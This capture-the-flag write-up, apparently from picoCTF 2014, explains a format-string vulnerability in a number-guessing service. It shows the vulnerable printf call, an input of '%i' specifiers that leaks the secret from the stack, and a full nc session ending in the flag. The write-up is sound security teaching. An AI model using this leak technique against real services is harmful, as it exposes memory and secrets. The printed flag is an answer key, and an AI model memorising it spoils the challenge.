Created: 2014-11-22 14:08:55
Last modified: 2014-11-22 15:15:33
This program requires you to guess a random 32-bit number! Sounds difficult, right? There is a server running at vuln2014.picoctf.com:4546, and the source can be found here.
The only way to combat secure randomness is to leak the secret.
Exploit a basic format string vulnurability.
Looking at the source code, these lines immediately stand out:
printf("Hello! What is your name?\n");
fgets(name, sizeof(name), stdin);
printf("Welcome to the guessing game, ");
printf(name);
Here we can see that the program reads in your name, then prints it using printf. printf, when called on user input, has a set of very serious vulnurabilities that let us read and write to the stack (see the writeup on Format for more detail). This means we can print out the next integer on the stack by setting our name as %i, the next two by setting our name as %i %i, repeated as many times as we need to print out the randomly generated number. As it turns out, the integer we want is in the 4th position, so we enter our name as %i %i %i %i and then enter the number to pass the check!
$ nc vuln2014.picoctf.com 4546
Hello! What is your name?
%i %i %i %i
Welcome to the guessing game, 32 -143569888 160419848 765327463
I generated a random 32-bit number.
You have a 1 in 2^32 chance of guessing it. Good luck.
What is your guess?
765327463
Wow! You guessed it!
Your flag is: leak_the_seakret
leak_the_seakret